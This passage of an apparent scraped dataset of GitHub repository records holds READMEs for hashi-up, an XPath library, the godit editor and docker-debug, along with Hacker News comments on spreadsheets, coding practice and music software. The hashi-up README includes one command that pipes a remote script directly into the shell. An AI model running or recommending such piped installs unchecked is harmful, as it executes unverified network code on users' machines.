illusion.Point is: I would be more likely to give it a shot given a base level of confidence about the security of storing anything in these sheets.Interested to hear your take!hey not sure if intended but the hero section looks odd at bigger screen sizes (https://imgur.com/a/j7QH8kJ)FYI There is PyXLL which is an add on for Microsoft excel that gives this functionality without a need to log into any thing.Reminds me a little of the long-defunct \"ResolverOne\" for which the only reference I could find was https://www.python.org/about/success/resolver/I think Gnumeric has supported this for years.https://help.gnome.org/users/gnumeric/stable/sect-extending-...I recall doing a noise model of a transimpedance amp in Gnumeric where I called out to Python/Numpy to do integration of 1/f noise based on parameters from a datasheet. That was at least 10 years ago. What's the difference between this Gnumeric feature and Neptyne?I may be wrong, but most people that know python have already understood there's better ways to code than spreadsheets. Also, at least where I live, not even Google could undermine Excel's dominance.PS: I'm convinced I was indeed wrong after reading replies, because I didn't consider the interaction of coders with no coders, and this tool may indeed be useful. Nevertheless I maintain these cultural changes are very hard, and wish the company good luck!This reminds me a lot of DabbleDB. It was an interesting application written in Seaside, a very cool web framework running inside the Smalltalk VM. They got acquired by Twitter.Did you build this from the ground up or are you leveraging a spreadsheet / grid library behind the scenes? Cool Project!I like the idea: I was actually looking at an open source tool that does something similar: combine spreadsheets with python.I do have a question: Similar tools tend to fall down after the code grows to a certain size. Modularity, unit tests, etc. become more useful at this point. I'm wondering if Neptyne will (or does?) support these sorts of features?Edit: Here's a link to the developer docs: https://docs.google.com/document/d/1zLOXBoy-nf05SU3d5sZ7lDDg...I'd like to try - it's quite a cool idea. But the interface seems broken.Is that the HN hug of death, or my corporate netowrk playing up?This looks really cool.When I try to get started on https://neptyne.com/neptyne/_new though, I get a HTTP 403 for the POST to https://neptyne.com/api/tyne_new and it brings be back to the selection screen.Very cool. I've done plenty of work supporting non-technical users who primarily interact with spreadsheets. This would definitely make my life easier.Is it going to be cloud-only, or are you planning on making a desktop app? If it's cloud-only, you can grab some (hopefully many) Google Sheets users, but most Excel users will probably pass.Hey, this is awesome! As someone who primarily codes in Python, I love that it's first class with a REPL! Nothing frustrates me more then when I have to figure out Javascript for scripting in Google Sheets.I ran through your demo and I have some feedback:- Tab completion in the REPL would be great.- When I change code in the editor, it doesn't update the cell where that code is used until I click on the cell, click away, and click back.- When I ran the append function, it worked, but if I look at the array in the cell, it's unchanged. If I click on the cell and hit enter, it wipes out the append. I'm honestly not sure what the right behavior here is, I can see use cases on both sides. But initially I did expect the cell with the array to update with the new array.- When I tried to do autocomplete on the capitals, it failed silently. I assume the API failed to fetch the capitals? It worked on the second try (but took a while).- When I add a column into the sheet, it breaks all the code that has cell references. I'd expect the code with cell references to get updated unless my references are $F$4 for example, just like in the sheet itself.Overall though this is a great start!This is a kind of product that\u2019s easy to scope creep so I\u2019m curious, how many person-months did it take you to build this MVP?Back in 2012, I used Data Nitro / Iron Spread. It enabled running Python on spreadsheets.My problem back then with the tool was that it sat between chairs. It was impossible to run Python entirely, as it only ran a subset of libraries and did not have a package manager, and it required thinking about cells, as is the case with Excel formulas.As a result, I could only use some of my Python codebase and not collaborate with other Excel users who were not Python experts. We ended up reverting to Excel formulas or VBA.I'm curious about who is the target user for Neptyne. Is it Python developers and data scientists who want to do some spreadsheet work?This looks very useful, I can see this being used in schools and universities for a plethora of studies.However I am European in EU, and while your Privacy policy is eminently readable, I don't think it can be used in EU school settings as you do not specify who your 3rd party service providers ar, what their privacy policys are or where data is hosted (thank you for making it human non lawyer readable).Schools/Universities in EU are not allowed to use services that are not hosted in EU.Im not sure if you use Google Analytics but please know that the legality of using GA in EU has been questioned in both Netherlands and Ireland. I'm not up to speed on the proceedings but I believe the Netherlands found it to be in violation of GDPR since the data was not stored or processed in EU. EDIT: Add Austria, France, Italy, Denmark, and now Finland to the list...Founder of AlphaSheets here -- we built this back in 2015 and developed it for 3 years. We built Python, R, SQL and full excel formula/hotkey/format/conditional formatting/ribbon compatibility. It was a long slog!I wish you good luck and all the best. It's a tough field but a big market. And I still think the potential is there.Why choose this over pySpread?https://pyspread.gitlab.ioThere have been a least half a dozen companies and countless FOSS projects attempting to do the exact same thing. What makes this special?can it handle a million rows? 10M?believe it or not this is my biggest problem with Sheets, and while Excel does better it's still capped at 1M1. Keep doing LC easy until they are easy, read and re-read comments and solutions until it sticks. You can get it, but it will take work.2. Even though you have MSc (in CS or similar I presume) go back and do an algos class on coursera (or similar).Perhaps focus in a given area/subject.Viewing this question abstractly, you are asking how do I get better at ?The answer is the same. Progressive load. Do something that you struggle with but can complete until it is no longer a huge struggle, then do something harder, progressively. Both biting off more than you can chew and not biting enough will prevent progress.The key thing to understand is that the feeling of struggle is exactly the feeling of learning, particularly for older people. The feeling of struggle is not metaphorically, but physically the precursor to learning. The feeling of struggle is marking brain cells to be altered during sleep (layman's translation of huberman podcast) which is when your brain actuates learning. So you must seek the feeling of struggle to be learning.A video-games dev told me to do Advent of Code instead of the hackerrank/leet-code nonsense -- it'd make me a better programmer that way. I dunno. You can do productive work but hiring is still about solving ridiculous things.Leet code is like prostitution. It\u2019s cheap, short term, and the employment prospects are high risk / low reward.In most of software there is no relation between being a good developer and being either highly valued or highly employable. Being good requires lots of practice solving tough problems. Being highly employable means high familiarity doing average things with tools incapable of solving tough problems.I\u2019d suggest perhaps finding a more senior colleague that can work through a few questions with you just to try and identify where your problem seems to be.However I\u2019d suggest that being able to write and analyse algorithms is more than mindless tick boxing \u2014 it is essential to backend beyond plumbing, so I personally think it\u2019s an investment.If you really only have time for one book, The Psychology of Computer Programming by Gerald Weinberg. Silver anniversary edition, it keeps the vast majority of the text intact and adds commentary between chapters by Weinberg.http://files.catwell.info/misc/mirror/the-unix-programming-e...there's none, try fewDesign Patterns: Elements of Reusable Object-Oriented Software\nhttps://geni.us/GQSURefactoring Improving the Design of Existing Code\nhttps://geni.us/u2s6pKOh wow cool niche question!Keeping complexity down is going to be the main issue (isn\u2019t it always). Music software can get very complex unfortunately.Is your daughter set on doing this \u201cin the box\u201d (on computer)? My first thought is that physical equipment might have easier (or at least more satisfying for a child) learning curves.Hopefully someone can hop in with concrete equipment for mixing or Linux software advice. Mac guy myself.Have you considered an iPad?https://www.bitwig.com/ has a demo and is reasonably priced. It's very similar to Ableton which I've used and really enjoy the workflow of.it\u2019s probably a better idea to get her a looper station from BOSS and a microphone. maybe a cheap keyboard as well from korg. from a few $100 she\u2019ll be set. linux does not really have what she is looking for unless she wants to get into hardcore screwing around with configuring obscure tools and DAWs and plugins which will not get her the results she wants.https://lmms.io/ is free and open source, and similar to FL Studio (though not as full-featured). LMMS might have a bit of a learning curve, but having used FL Studio in the past I had no problem plonking out some simple tunes (after downloading some free SoundFonts I found on Google).It should be installable via apt, so it's easy to try it out, anyways!This was me twenty years ago. So mandatory disclaimer, I was classically trained from the age of like 7 to 20.I can't stress enough the value of private instruction. Keyboard and voice lessons are relatively inexpensive (not free, of course, but not the biggest luxury) and access to a keyboard or guitar (those especially!) and a teacher who can show proper technique to play and sing is really great. Music is taught primarily in a master/apprentice form and more important than doodling in a DAW is getting someone to show you how to doodle. A relatively inexpensive keyboard and some lessons on playing will go further than any software. Personally I took keyboard and later recording/production lessons and it really gave me the tools to create.For the tech part, you need three things. A mic to record the voice, a midi keyboard (if you go with lessons you'll need a decent keyboard anyway, and most can be plugged into the computer with USB these days), and a DAW (digital audio workstation). The cheapest form factor now is an iPad with garage band, which is famously user friendly. If you're committed to Linux, bitwig is great but your kid will need to do a lot of self study and practice with YouTube tutorials. Something that can't be beat is a smartphone or tablet with voice memos recording them playing and singing. Audacity can do that.As an avid Linux user with a lot of experience I will say it sucks for beginner audio work. Get a Mac and use GarageBand, it just works.If my kid wanted to make music I'd get them a keyboard and lessons, then a voice recorder to make the music. DAWs are essential for pro work but it's a lot to ingest for beginners. Most teachers will be familiar with how to use them these days, ifs standard fare to teach in college.If she really wants to do something, she can figure it out even if the UX is not extremely simple. Kids are learning machines.Music theory is optional.Why can't she use the same web based application on her laptop? DAWs are, by nature, extremely complicated, Linux or not. If she has something that already works, I don't see why you'd want to change.I'd like to mention SonicPi though. It's a platform for creating music through code, and is used all over the world to teach kids both programming and music production at the same time. It's really cool.Get her Bitwig! The 16-track version would be perfect to start with, and is on sale right now: https://www.bitwig.com/buy/Bitwig is one of the only major audio workstations taking Linux seriously. They're basically building a supercharged version of Ableton Live, and it's got great multiplatform support. If latest PopOS! has PipeWire enabled, then all you need to install is your pipewire-jack package for the audio server, and your bitwig-studio package for Bitwig. Once you have Bitwig installed, you can boot that up and activate it with whichever version you get. It's a seriously powerful tool, and pairs nicely with touchscreen devices. Works great with MIDI enabled hardware, too!i cant wait to have a daughter, ill show her hanna montana linux> At what point do you consider a frontend framework essential and not just a feature?Browser computer games come to mind, it's really difficult to do them without writing tons of JS. and when you are forced to write tons of JS it's better to use a framework.\nHowever, a mostly content based website (which is most of the web) doesn't really need a lot of JS so doesn't need a framework.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jsiebens/hashi-up", "link": "https://github.com/jsiebens/hashi-up", "tags": ["hashicorp", "nomad", "consul", "automation", "devops", "go", "raspberry-pi", "nomad-cluster", "vault", "consul-cluster", "vault-cluster", "ssh-agent", "vm", "cloud", "devtools", "golang", "linux", "boundary"], "stars": 548, "description": "bootstrap HashiCorp Consul, Nomad, or Vault over SSH < 1 minute", "lang": "Go", "repo_lang": "", "readme": "# hashi-up\n\nhashi-up is a lightweight utility to install HashiCorp [Consul](https://www.consul.io/), [Nomad](https://www.nomadproject.io) or [Vault](https://www.vaultproject.io/) on any remote Linux host. All you need is `ssh` access and the binary `hashi-up` to build a Consul, Nomad or Vault cluster.\n\nThe tool is written in Go and is cross-compiled for Linux, Windows, MacOS and even on Raspberry Pi.\n\nThis project is heavily inspired on the work of [Alex Ellis](https://www.alexellis.io/) who created [k3sup](https://k3sup.dev/), a tool to to get from zero to KUBECONFIG with [k3s](https://k3s.io/)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/jsiebens/hashi-up)](https://goreportcard.com/report/github.com/jsiebens/hashi-up)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n![GitHub All Releases](https://img.shields.io/github/downloads/jsiebens/hashi-up/total)\n\n## What's this for?\n\nThis tool uses `ssh` to install HashiCorp Consul, Nomad or Vault to a remote Linux host. You can also use it to join existing Linux hosts into a Consul, Nomad, Vault or Boundary cluster. First, Consul, Nomad or Vault is installed using a utility script, along with a minimal configuration to run the agent as server or client.\n\n`hashi-up` was developed to automate what can be a very manual and confusing process for many developers, who are already short on time. Once you've provisioned a VM with your favourite tooling, `hashi-up` means you are only 60 seconds away from running `nomad status` on your own computer.\n\n## Download `hashi-up`\n\n`hashi-up` is distributed as a static Go binary. \nYou can use the installer on MacOS and Linux, or visit the Releases page to download the executable for Windows.\n\n``` shell\ncurl -sLS https://get.hashi-up.dev | sh\nsudo install hashi-up /usr/local/bin/\n\nhashi-up version\n```\n\n## Usage\n\nThe `hashi-up` tool is a client application which you can run on your own computer. It uses SSH to connect to remote servers when installing HashiCorp Consul or Nomad. Binaries are provided for MacOS, Windows, and Linux (including ARM).\n\n### SSH credentials\n\nBy default, `hashi-up` talks to an SSH agent on your host via the SSH agent protocol. This saves you from typing a passphrase for an encrypted private key every time you connect to a server.\nThe `ssh-agent` that comes with OpenSSH is commonly used, but other agents, like gpg-agent or yubikey-agent are supported by setting the `SSH_AUTH_SOCK` environment variable to the Unix domain socket of the agent.\n\nThe `--ssh-target-key` flag can be used when no agent is available or when a specific private key is preferred.\n\nThe `--ssh-target-user` and `--ssh-target-password` flags allow you to authenticate using a username and a password.\n\n### Guides\n\n- [Installing Consul](docs/consul.md)\n- [Installing Nomad](docs/nomad.md)\n- [Installing Vault](docs/vault.md)\n- [Installing Boundary](docs/boundary.md)\n\n## Resources\n\n[Deploying a highly-available Nomad cluster with hashi-up!](https://johansiebens.dev/posts/2020/07/deploying-a-highly-available-nomad-cluster-with-hashi-up/)\n\n[Building a Nomad cluster on Raspberry Pi running Ubuntu server](https://johansiebens.dev/posts/2020/08/building-a-nomad-cluster-on-raspberry-pi-running-ubuntu-server/)\n\n[Installing HashiCorp Vault on DigitalOcean with hashi-up](https://johansiebens.dev/posts/2020/12/installing-hashicorp-vault-on-digitalocean-with-hashi-up/)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "antchfx/xpath", "link": "https://github.com/antchfx/xpath", "tags": ["xpath", "golang", "xml", "html", "xpath-patterns", "xpath-query", "selects-descendants", "xpath2", "go", "go-xml"], "stars": 549, "description": "XPath package for Golang, supports HTML, XML, JSON document query.", "lang": "Go", "repo_lang": "", "readme": "XPath\n====\n[![GoDoc](https://godoc.org/github.com/antchfx/xpath?status.svg)](https://godoc.org/github.com/antchfx/xpath)\n[![Coverage Status](https://coveralls.io/repos/github/antchfx/xpath/badge.svg?branch=master)](https://coveralls.io/github/antchfx/xpath?branch=master)\n[![Build Status](https://travis-ci.org/antchfx/xpath.svg?branch=master)](https://travis-ci.org/antchfx/xpath)\n[![Go Report Card](https://goreportcard.com/badge/github.com/antchfx/xpath)](https://goreportcard.com/report/github.com/antchfx/xpath)\n\nXPath is Go package provides selecting nodes from XML, HTML or other documents using XPath expression.\n\nImplementation\n===\n\n- [htmlquery](https://github.com/antchfx/htmlquery) - an XPath query package for HTML document\n\n- [xmlquery](https://github.com/antchfx/xmlquery) - an XPath query package for XML document.\n\n- [jsonquery](https://github.com/antchfx/jsonquery) - an XPath query package for JSON document\n\nSupported Features\n===\n\n#### The basic XPath patterns.\n\n> The basic XPath patterns cover 90% of the cases that most stylesheets will need.\n\n- `node` : Selects all child elements with nodeName of node.\n\n- `*` : Selects all child elements.\n\n- `@attr` : Selects the attribute attr.\n\n- `@*` : Selects all attributes.\n\n- `node()` : Matches an org.w3c.dom.Node.\n\n- `text()` : Matches a org.w3c.dom.Text node.\n\n- `comment()` : Matches a comment.\n\n- `.` : Selects the current node.\n\n- `..` : Selects the parent of current node.\n\n- `/` : Selects the document node.\n\n- `a[expr]` : Select only those nodes matching a which also satisfy the expression expr.\n\n- `a[n]` : Selects the nth matching node matching a When a filter's expression is a number, XPath selects based on position.\n\n- `a/b` : For each node matching a, add the nodes matching b to the result.\n\n- `a//b` : For each node matching a, add the descendant nodes matching b to the result. \n\n- `//b` : Returns elements in the entire document matching b.\n\n- `a|b` : All nodes matching a or b, union operation(not boolean or).\n\n- `(a, b, c)` : Evaluates each of its operands and concatenates the resulting sequences, in order, into a single result sequence\n\n- `(a/b)` : Selects all matches nodes as grouping set.\n\n#### Node Axes \n\n- `child::*` : The child axis selects children of the current node.\n\n- `descendant::*` : The descendant axis selects descendants of the current node. It is equivalent to '//'.\n\n- `descendant-or-self::*` : Selects descendants including the current node.\n\n- `attribute::*` : Selects attributes of the current element. It is equivalent to @*\n\n- `following-sibling::*` : Selects nodes after the current node.\n\n- `preceding-sibling::*` : Selects nodes before the current node.\n\n- `following::*` : Selects the first matching node following in document order, excluding descendants. \n\n- `preceding::*` : Selects the first matching node preceding in document order, excluding ancestors. \n\n- `parent::*` : Selects the parent if it matches. The '..' pattern from the core is equivalent to 'parent::node()'.\n\n- `ancestor::*` : Selects matching ancestors.\n\n- `ancestor-or-self::*` : Selects ancestors including the current node.\n\n- `self::*` : Selects the current node. '.' is equivalent to 'self::node()'.\n\n#### Expressions\n\n The gxpath supported three types: number, boolean, string.\n\n- `path` : Selects nodes based on the path.\n\n- `a = b` : Standard comparisons.\n\n * a = b\t True if a equals b.\n * a != b\tTrue if a is not equal to b.\n * a < b\t True if a is less than b.\n * a <= b\tTrue if a is less than or equal to b.\n * a > b\t True if a is greater than b.\n * a >= b\tTrue if a is greater than or equal to b.\n\n- `a + b` : Arithmetic expressions.\n\n * `- a`\tUnary minus\n * a + b\tAdd\n * a - b\tSubstract\n * a * b\tMultiply\n * a div b\tDivide\n * a mod b\tFloating point mod, like Java.\n\n- `a or b` : Boolean `or` operation.\n\n- `a and b` : Boolean `and` operation.\n\n- `(expr)` : Parenthesized expressions.\n\n- `fun(arg1, ..., argn)` : Function calls:\n\n| Function | Supported |\n| --- | --- |\n`boolean()`| \u2713 |\n`ceiling()`| \u2713 |\n`choose()`| \u2717 |\n`concat()`| \u2713 |\n`contains()`| \u2713 |\n`count()`| \u2713 |\n`current()`| \u2717 |\n`document()`| \u2717 |\n`element-available()`| \u2717 |\n`ends-with()`| \u2713 |\n`false()`| \u2713 |\n`floor()`| \u2713 |\n`format-number()`| \u2717 |\n`function-available()`| \u2717 |\n`generate-id()`| \u2717 |\n`id()`| \u2717 |\n`key()`| \u2717 |\n`lang()`| \u2717 |\n`last()`| \u2713 |\n`local-name()`| \u2713 |\n`matches()`| \u2713 |\n`name()`| \u2713 |\n`namespace-uri()`| \u2713 |\n`normalize-space()`| \u2713 |\n`not()`| \u2713 |\n`number()`| \u2713 |\n`position()`| \u2713 |\n`replace()`| \u2713 |\n`reverse()`| \u2713 |\n`round()`| \u2713 |\n`starts-with()`| \u2713 |\n`string()`| \u2713 |\n`string-length()`| \u2713 |\n`substring()`| \u2713 |\n`substring-after()`| \u2713 |\n`substring-before()`| \u2713 |\n`sum()`| \u2713 |\n`system-property()`| \u2717 |\n`translate()`| \u2713 |\n`true()`| \u2713 |\n`unparsed-entity-url()` | \u2717 |", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nsf/godit", "link": "https://github.com/nsf/godit", "tags": [], "stars": 548, "description": "A very religious text editor", "lang": "Go", "repo_lang": "", "readme": " --== Godit - a very religious text editor ==--\n\nScreenshots:\n\n * https://nosmileface.dev/images/godit-linux1.png\n * https://nosmileface.dev/images/godit-linux2.png\n\nI call it religious, because there is a strong faith in the \"one true way\"\nof doing things. By that I mean things like: \"the tab size is always an\nequivalent to 8 spaces/characters\" or \"each line ends with '\\n' symbol and\nsomeone should end this '\\r\\n' madness\" or \"text files are always utf-8\nencoded\". Most editors provide customizable options for these things, but\ngodit takes a different approach in that area and has no settings at all. So,\nthat concludes the ideology behind godit.\n\nIf you're interested in what godit feels like, it would be fair to say that it\nis an emacsish lightweight text editor. The godit uses many of the emacs key\nbindings and operates using a notion of \"micromodes\". It's easier to explain\nwhat a micromode is by a simple example. Let's take the keyboard macros feature\nfrom both emacs and godit. You can start recording a macro using `C-x (` key\ncombination and then when you're ready to start repeating it, you do the\nfollowing: `C-x e (e...)`. Not only `C-x e` ends the recording of a macro, it\nexecutes the macro once and enters a micromode, where typing `e` again, will\nrepeat that action. But as soon as some other key was pressed you quit this\nmicromode and everything is back to normal again. The idea of micromode is used\nin godit a lot.\n\n\n --== List of keybindings ==--\n\nBasic things:\n C-g - Universal cancel button\n C-x C-c - Quit from the godit\n C-x C-s - Save file [prompt maybe]\n C-x S - Save file (raw) [prompt maybe]\n C-x M-s - Save file as [prompt]\n C-x M-S - Save file as (raw) [prompt]\n C-x C-f - Open file\n M-g - Go to line [prompt]\n C-/ - Undo\n C-x C-/ (C-/...) - Redo\n\nView/buffer operations:\n C-x C-w - View operations mode\n C-x 0 - Kill active view\n C-x 1 - Kill all views but active\n C-x 2 - Split active view vertically\n C-x 3 - Split active view horizontally\n C-x o - Make a sibling view active\n C-x b - Switch buffer in the active view [prompt]\n C-x k - Kill buffer in the active view\n\nView operations mode:\n v - Split active view vertically\n h - Split active view horizontally\n k - Kill active view\n C-f, - Expand/shrink active view to the right\n C-b, - Expand/shrink active view to the left\n C-n, - Expand/shrink active view to the bottom\n C-p, - Expand/shrink active view to the top\n 1, 2, 3, 4, ... - Select view\n\nCursor/view movement and text editing:\n C-f, - Move cursor one character forward\n M-f - Move cursor one word forward\n C-b, - Move cursor one character backward\n M-b - Move cursor one word backward\n C-n, - Move cursor to the next line\n C-p, - Move cursor to the previous line\n C-e, - Move cursor to the end of line\n C-a, - Move cursor to the beginning of the line\n C-v, - Move view forward (half of the screen)\n M-v, - Move view backward (half of the screen)\n C-l - Center view on line containing cursor\n C-s - Search forward [interactive prompt]\n C-r - Search backward [interactive prompt]\n C-j - Insert a newline character and autoindent\n - Insert a newline character\n - Delete one character backwards\n C-d, - Delete one character in-place\n M-d - Kill word\n M- - Kill word backwards\n C-k - Kill line\n M-u - Convert the following word to upper case\n M-l - Convert the following word to lower case\n M-c - Capitalize the following word\n - Insert character\n\nMark and region operations:\n C- - Set mark\n C-x C-x - Swap cursor and mark locations\n C-x > (>...) - Indent region (lines between the cursor and the mark)\n C-x < (<...) - Deindent region (lines between the cursor and the mark)\n C-x C-r - Search & replace (within region) [prompt]\n C-x C-u - Convert the region to upper case\n C-x C-l - Convert the region to lower case\n C-w - Kill region (between the cursor and the mark)\n M-w - Copy region (between the cursor and the mark)\n C-y - Yank (aka Paste) previously killed/copied text\n M-q - Fill region (lines between the cursor and the mark) [prompt]\n\nAdvanced:\n M-/ - Local words autocompletion\n C-x C-a - Invoke buffer specific autocompletion menu [menu]\n C-x ( - Start keyboard macro recording\n C-x ) - Stop keyboard macro recording\n C-x e (e...) - Stop keyboard macro recording and execute it\n C-x = - Info about character under the cursor\n C-x ! - Filter region through an external command [prompt]\n\n\n --== Current development state==--\n\nI'm still in process of designing some parts of it. Bits of functionality are\nmissing, but frankly I write godit in godit already and I use godit for\neverything else on my system (EDITOR=godit). This README was written in godit\nfrom scratch, I write commit messages in godit, I write code in godit, I write\nconfigs and scripts in godit. The editor is definitely usable, but it is\ncertain that some corner cases are not covered. Just try it, perhaps you would\nlike it. Oh and I'm very picky about feature suggestions at the moment,\nsuggest, but don't expect too much.\n", "readme_type": "text", "hn_comments": "I'm wondering this myself. I'm currently in a part-time contract for indie game development work. While it's been great, as far as I know it's an unusual situation to be in. It hasn't been easy for me to find another good complementary PT software job.I am not expecting stocks or huge benefits at these sorts of jobs. What I am hoping to get out of these jobs is a stepping stone into more advanced and involved roles with the company. My current PT job is a big departure from my last job in terms of both tech skills and industry.I'd love such an arrangement myself too, especially remotely. I have friends who tutor on Thinkful or some other company so they can choose to do fewer hours a week and dedicate themselves to family/projects, but that pays much less than working as an engineer. It works for them because they live in low cost-of-living countries.Yes.[thanks for asking this. i had always wondered how those physicists felt / could have done what they did. and now i read your question and understand them much better.]\"the tab size is always an equivalent to 8 spaces/characters\" - our faiths are incompatible8 characters tab width is insane. :(But why oh why immitate the Emacs shortcuts?I love Emacs. I use it all the time. But the default shortcuts are the most stupid thing ever. That Control-x (C-x in Emacs lingua) is insanity at its best: due to the stupid non-symmetric layout of typical staggered keyboards 'x' in itself is one the hardest key to type (the equivalent with the right hand is way easier : '>' on a QWERTY keyboard). I'm a touch-typist and to hit 'x' I need to move my whole hand a bit. To hit '>' I just need to move on finger. I blame this on the fact that keyboard are using a staggered layout instead of a matrix or symmetric layout but whatever.Then Control. Zomg. Control has to be accessed with the left pinky if you're a touch-typist: some very touch-typist friendly keyboards like the HHKB Pro 2 don't even botter with a right control key.So to hit \"C-x\" you're supposed to use the two leftmost fingers of your left hand: this alone has to be one of the most RSI inducing keyboard shortcut ever.But in Emacs everything is configurable. So I'm using \"C-,\" to replace \"C-x\" and \"M-,\" to replace \"M-x\".It shall never cease to amaze me (in a very sad way) that when people \"copy Emacs\", the first thing they copy are the Emacs shortcuts. The Emacs shortcuts are the lamest thing ever in Emacs.I love Emacs but I hate its default shortcuts. Emacs is not about its shortcuts: Emacs is about tailoring it to your needs by using Lisp.I'm also wondering why that constant loss of energy in editors which shall never produce anything close to what one million lines of elisp code are providing. I'd much rather see that energy spend on creating a bridge for the Go-completion facility in Emacs, the real thing. And no wonder, for Satan himself masquerades as an angel of light.\n ~ 2 Corinthians 11:15\n\nEmacs is the devilIs it a Go thing to have no file organisation? (Is this tooling sufficiently nice that this is manageable?)I think Gomacs or Gemacs would've been better name. It looks so similar to emacs.Performance is truly impressive. And I really love how small the codebase actually is. I've been dreaming about writing my own text editor for quite some time. This will really help me to get started, thanks a lot nsf!p.s. panic on opening a directory isn't really a best way to say that you don't support viewing directories...why not just emacs?if only it had Vim bindings instead of Emacs bindings :/I've been searching for something less bloated than Vim for a while (straight vi doesn't cut it).", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zeromake/docker-debug", "link": "https://github.com/zeromake/docker-debug", "tags": ["docker", "debug", "cli", "exec"], "stars": 548, "description": "use new container attach on already container go on debug", "lang": "Go", "repo_lang": "", "readme": "# Docker-debug\n\n[![Build Status](https://github.com/zeromake/docker-debug/actions/workflows/release.yml/badge.svg)](https://github.com/zeromake/docker-debug/actions/workflows/release.yml)\n[![Go Report Card](https://goreportcard.com/badge/zeromake/docker-debug)](https://goreportcard.com/report/zeromake/docker-debug)\n\n[English](README.md) \u2219 [\u7b80\u4f53\u4e2d\u6587](README-zh-Hans.md)\n\n## Overview\n\n`docker-debug` is an troubleshooting running docker container,\nwhich allows you to run a new container in running docker for debugging purpose.\nThe new container will join the `pid`, `network`, `user`, `filesystem` and `ipc` namespaces of the target container, \nso you can use arbitrary trouble-shooting tools without pre-installing them in your production container image.\n\n## Demo\n[![asciicast](https://asciinema.org/a/235025.svg)](https://asciinema.org/a/235025)\n## Quick Start\n\nInstall the `docker-debug` cli\n\n**mac brew**\n```shell\nbrew install zeromake/docker-debug/docker-debug\n```\n\n**download binary file**\n\n
\n\nuse bash or zsh\n\n\n``` bash\n# get latest tag\nVERSION=`curl -w '%{url_effective}' -I -L -s -S https://github.com/zeromake/docker-debug/releases/latest -o /dev/null | awk -F/ '{print $NF}'`\n\n# MacOS Intel\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/${VERSION}/docker-debug-darwin-amd64\n\n# MacOS M1\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/${VERSION}/docker-debug-darwin-arm64\n\n# Linux\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/${VERSION}/docker-debug-linux-amd64\n\nchmod +x ./docker-debug\nsudo mv docker-debug /usr/local/bin/\n\n# Windows\ncurl -Lo docker-debug.exe https://github.com/zeromake/docker-debug/releases/download/${VERSION}/docker-debug-windows-amd64.exe\n```\n\n
\n\n
\n\nuse fish\n\n\n``` fish\n# get latest tag\nset VERSION (curl -w '%{url_effective}' -I -L -s -S https://github.com/zeromake/docker-debug/releases/latest -o /dev/null | awk -F/ '{print $NF}')\n\n# MacOS Intel\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/$VERSION/docker-debug-darwin-amd64\n\n# MacOS M1\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/$VERSION/docker-debug-darwin-arm64\n\n# Linux\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/$VERSION/docker-debug-linux-amd64\n\nchmod +x ./docker-debug\nsudo mv docker-debug /usr/local/bin/\n\n# Windows\ncurl -Lo docker-debug.exe https://github.com/zeromake/docker-debug/releases/download/$VERSION/docker-debug-windows-amd64.exe\n```\n
\n\n\ndownload the latest binary from the [release page](https://github.com/zeromake/docker-debug/releases/lastest) and add it to your PATH.\n\n**Try it out!**\n``` shell\n# docker-debug [OPTIONS] CONTAINER COMMAND [ARG...] [flags]\ndocker-debug CONTAINER COMMAND\n\n# More flags\ndocker-debug --help\n\n# info\ndocker-debug info\n```\n\n## Build from source\nClone this repo and:\n``` shell\ngo build -o docker-debug ./cmd/docker-debug\nmv docker-debug /usr/local/bin\n```\n\n## Default image\ndocker-debug uses nicolaka/netshoot as the default image to run debug container.\nYou can override the default image with cli flag, or even better, with config file ~/.docker-debug/config.toml\n``` toml\nversion = \"0.7.4\"\nimage = \"nicolaka/netshoot:latest\"\nmount_dir = \"/mnt/container\"\ntimeout = 10000000000\nconfig_default = \"default\"\n\n[config]\n [config.default]\n version = \"1.40\"\n host = \"unix:///var/run/docker.sock\"\n tls = false\n cert_dir = \"\"\n cert_password = \"\"\n```\n\n## Todo\n- [x] support windows7(Docker Toolbox)\n- [ ] support windows10\n- [ ] refactoring code\n- [ ] add testing\n- [x] add changelog\n- [x] add README_CN.md\n- [x] add brew package\n- [x] docker-debug version manage config file\n- [x] cli command set mount target container filesystem\n- [x] mount volume filesystem\n- [x] docker connection config on cli command\n- [x] `-v` cli args support\n- [ ] docker-debug signal handle smooth exit\n- [ ] cli command document on readme\n- [ ] config file document on readme\n- [ ] add http api and web shell\n\n## Details\n1. find image docker is has, not has pull the image.\n2. find container name is has, not has return error.\n3. from customize image runs a new container in the container's namespaces (ipc, pid, network, etc, filesystem) with the STDIN stay open.\n4. create and run a exec on new container.\n5. Debug in the debug container.\n6. then waits for the debug container to exit and do the cleanup.\n\n## Reference & Thank\n1. [kubectl-debug](https://github.com/aylei/kubectl-debug): `docker-debug` inspiration is from to this a kubectl debug tool.\n2. [Docker\u6838\u5fc3\u6280\u672f\u4e0e\u5b9e\u73b0\u539f\u7406](https://draveness.me/docker): `docker-debug` filesystem is from the blog.\n3. [docker-engine-api-doc](https://docs.docker.com/engine/api/latest): docker engine api document.\n\n## Contributors\n\n### Code Contributors\n\nThis project exists thanks to all the people who contribute. [[Contribute](CONTRIBUTING.md)].\n\n\n### Financial Contributors\n\nBecome a financial contributor and help us sustain our community. [[Contribute](https://opencollective.com/docker-debug/contribute)]\n\n#### Individuals\n\n\n\n#### Organizations\n\nSupport this project with your organization. Your logo will show up here with a link to your website. [[Contribute](https://opencollective.com/docker-debug/contribute)]\n\n\n\n\n\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jetstack/version-checker", "link": "https://github.com/jetstack/version-checker", "tags": ["kubernetes", "prometheus", "image", "version", "utility", "sre", "go", "grafana", "grafana-dashboard", "docker", 